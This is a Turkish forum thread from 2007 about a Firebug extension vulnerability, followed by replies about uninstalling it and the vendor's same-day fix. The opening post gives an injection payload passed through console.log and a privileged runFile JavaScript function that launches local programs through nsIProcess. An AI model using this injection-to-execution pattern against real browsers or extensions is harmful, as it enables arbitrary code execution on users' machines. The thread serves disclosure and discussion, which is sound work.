Firebug"Da Büyük Açık Ke$Fedildi :| [4Nisan]
-
cnaımız ciğerimiz firefox'un can yoldaşı javascript yazarlarının biricik sevgilisi firebug firefox'un file objesine direkt erişime sahip olduğundna hertürlü ipneliği çalıştırma yetkisine olanak veriyo.
Console.log komutuyla normalde konsola debug ederiz bişeyler ama şu şekilde log edince;console.log({'<script>alert("tahribat.kon")</script>':'exploit'})
script çalışıyo hemde en kötüsü firefoxun web sitesine verdiği yetki değil firefoxun eklentiye verdiği yetki üzerindne çalışıyo.. nelermi yapılaiblir? herşey! örneğin geçenlerde çıkan şu file execute olayı hemen çözülmüştü ama firebug bunu halen çalıştıracak yetkiye sahip... firefox için runfile komutu;
function runFile(f) {
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);file.initWithPath(f);
var process = Components.classes["@mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess);process.init(file);
var argv = Array.prototype.slice.call(arguments, 1);
process.run(true, argv, argv.length);
}ne yapmalı? çözümü bulunana kadar firebug kullanmamalı.
daha fazla ayrıntı; http://www.gnucitizen.org/blog/firebug-goes-evil -
nasıl kaldırılıo bu firebug?
-
yazdığın kodları benim gibi programlama bilmeyen dallamalar için bi açıklayabilirmisin?function runFile(f) {
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);ne diyo bu amk :S
-
firebug bi eklentidir bütün firefox sürümlerinde olan bişey dğeil yani. ama js programcılaırnın, xhtml kodlayanların çoğu kullanır. www.getfirebug.com adresindne çekilir kaldırmak içinde eklentilerden kaldırı seçicen sadece.
-
gecen burdan birisi linkini vermisti indirmistim ne şanssız adamım daha yararlanamadan acık cıktı
-
CVE Referansı yok mu? Planet Security[1]'e haber düşmedi..
http://planetsecurity.bacarospo.net/
Açığın doğrulandığına dair herhangi bir haber yok, beklemeyi ve kullanmamayı tercih ediyorum :)
-
Her neyse, açık kapatıldı;
About an hour ago I received word of a 0-day security exploit that has been discovered and reported. I have just released a new Firebug (version 1.03) with a fix for this bug, and I recommend that everyone install it as soon as possible.
http://www.getfirebug.com/blog/2007/04/04/security-update/
-
çıktığı gün kapandı ha : )
gözünü sevdiğimin opın sörcü
-
Onemli olan ciktigi gun kapatilmasi degilki :) acik duyuruldugu andan itibaren bitmis demektir.Kim bilir ne canlar yandi bu aciktan :)
-
firefox operanın züküne kurban olsun. en temizi opera
-
ComputerWolf bunu yazdı:
-----------------------------
Onemli olan ciktigi gun kapatilmasi degilki :) acik duyuruldugu andan itibaren bitmis demektir.Kim bilir ne canlar yandi bu aciktan :)
-----------------------------Evet, microsoft ie'deki açıklarını en erken 4 ayda kapatıyor. Kim bilir ne canlar yanmıştır :)